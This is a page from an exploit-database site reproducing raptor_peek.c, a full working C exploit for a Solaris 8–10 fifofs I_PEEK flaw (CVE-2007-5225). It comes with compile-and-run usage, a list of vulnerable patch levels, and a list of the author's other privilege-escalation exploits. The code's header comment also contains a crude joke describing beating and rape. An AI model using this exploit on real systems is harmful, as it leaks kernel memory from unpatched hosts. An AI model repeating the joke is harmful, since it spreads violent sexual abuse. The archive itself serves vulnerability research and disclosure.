Search for hundreds of thousands of exploits

"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

solaris

Release date

Exploit published date

2008-03-10

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
/*
 * $Id: raptor_peek.c,v 1.1 2007/10/18 08:09:02 raptor Exp $
 *
 * raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak
 * Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * [Lame] integer signedness error in FIFO filesystems (named pipes) on Sun 
 * Solaris 8 through 10 allows local users to read the contents of unspecified 
 * memory locations via a negative value to the I_PEEK ioctl (CVE-2007-5225).
 *
 *        /\   AS PART OF A VAST WORLD-WIDE CONSPIRACY              
 *  hjm  /  \   I COMMAND THEE:  BEAT OFF UNTO ME                   
 *      /,--.\                                                      
 *     /< () >\   IF I SAY "FNORD" AT THE END OF A SENTENCE         
 *    /  `--'  \   DOES THAT MAKE ME REALLY FUNNY OR SOMEONE        
 *   /          \   WHO NEEDS TO GET FUCKING BEATEN TO NEAR         
 *  /            \   DEATH AND THEN RAPED WITH A BROOM              
 * /______________\                                                 
 *                  AS YOU CAN SEE THAT'S REALLY TWO JOKES IN ONE
 *                   SO YOU REALLY GET YOUR MONEY'S WORTH HERE   
 * Usage:
 * $ gcc raptor_peek.c -o raptor_peek -Wall
 * $ ./raptor_peek kerndump 666666
 * [...]
 * $ ls -l kerndump 
 * -rwx------   1 raptor   staff     666666 Oct 17 19:33 kerndump
 *
 * Vulnerable platforms (SPARC):
 * Solaris 8 without patch 109454-06 [tested]
 * Solaris 9 without patch 117471-04 [tested]
 * Solaris 10 without patch 127737-01 [tested]
 *
 * Vulnerable platforms (x86):
 * Solaris 8 without patch 109455-06 [untested]
 * Solaris 9 without patch 117472-04 [untested]
 * Solaris 10 without patch 127738-01 [untested]
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/stat.h>

#define	INFO1	"raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak"
#define	INFO2	"Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define	BADFIFO	"/tmp/fnord"
#define BUFSIZE 1000000

int 	errno;

int main(int argc, char **argv)
{
	int 		fd, fifo;
	size_t		out, bufsize = BUFSIZE;
	char		*buf;
	struct strpeek 	peek;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc < 2) {
		fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]);
		exit(1);
	}
	if (argc > 2)
		if ((bufsize = atoi(argv[2])) == 0) {
			fprintf(stderr, "Error (atoi): invalid outsize\n");
			exit(1);
		}

	/* print some output */
	fprintf(stderr, "Using outfile\t: %s\n", argv[1]);
	fprintf(stderr, "Using outsize\t: %u\n\n", bufsize);

	/* prepare the output buffer */
	if ((buf = (char *)malloc(bufsize)) == NULL) {
		perror("Error (malloc)");
		fprintf(stderr, "Hint: Try again with a smaller output size\n");
		exit(1);
	}
	memset(buf, 0, bufsize);

	/* create the named pipe */
	unlink(BADFIFO);
	if (mknod(BADFIFO, S_IFIFO | S_IRWXU, 0) < 0) {
		perror("Error (mknod)");
		exit(1);
	}

	switch(fork()) {
	case -1: 	/* cannot fork */
		perror("Error (fork)");
		exit(1);
	case 0: 	/* the child writes */
		if ((fifo = open(BADFIFO, O_WRONLY, 0)) < 0) {
			perror("Error (open)");
			exit(1);
		}
		write(fifo, "FNORD", 5);
		exit(0);
	default: 	/* the parent reads */
		/* FALL THROUGH */
		;
	}

	/* perform the MAGICK */
	if ((fifo = open(BADFIFO, O_RDONLY, 0)) < 0) {
		perror("Error (open)");
		exit(1);
	}

	memset(&peek, 0, sizeof(peek));
	peek.databuf.buf = buf;
	peek.databuf.maxlen = -1; /* FNORD! */

	if (ioctl(fifo, I_PEEK, &peek) < 0 ) {
		perror("Error (ioctl)");
		close(fifo);
		exit(1);
	}

	/* save output to outfile */
	if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) {
		perror("Error (open)");
		close(fifo);
		exit(1);
	}
	out = write(fd, buf, bufsize);

	fprintf(stderr, "FNORD! %u bytes written to %s\n", out, argv[1]);
	fprintf(stderr, "Hint: Try also with a bigger output size\n");

	/* cleanup (who cares about free?;) */
	close(fd);
	close(fifo);

	exit(0);
}

// milw0rm.com [2008-03-10]
Release DateTitleTypePlatformAuthor
2020-04-21"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation"localsolaris"Marco Ivaldi"
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2019-10-21"Solaris 11.4 - xscreensaver Privilege Escalation"localsolaris"Marco Ivaldi"
2019-10-16"Solaris xscreensaver 11.4 - Privilege Escalation"localsolaris"Marco Ivaldi"
2019-06-17"Exim 4.87 - 4.91 - Local Privilege Escalation"locallinux"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation"localsolaris"Marco Ivaldi"
2019-01-14"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)"localsolaris"Marco Ivaldi"
2018-11-30"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation"localopenbsd"Marco Ivaldi"
2018-10-30"xorg-x11-server 1.20.3 - Privilege Escalation"localopenbsd"Marco Ivaldi"
2009-09-11"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug"localaix"Marco Ivaldi"
2008-03-10"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"localsolaris"Marco Ivaldi"
2007-04-04"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation"localwindows"Marco Ivaldi"
2007-02-13"Lotus Domino R6 Webmail - Remote Password Hash Dumper"remotewindows"Marco Ivaldi"
2007-02-13"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack"remotemultiple"Marco Ivaldi"
2007-02-06"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution"remotewindows"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'extproc' Local/Remote Command Execution"remotemultiple"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'utl_file' FileSystem Access"remotelinux"Marco Ivaldi"
2006-11-23"Oracle 9i/10g - 'read/write/execute' ation Suite"remotemultiple"Marco Ivaldi"
2006-10-24"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)"localsolaris"Marco Ivaldi"
2006-10-24"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-16"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-13"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-10-13"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-09-13"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak"localsolaris"Marco Ivaldi"
2006-07-18"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation"locallinux"Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/5227/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.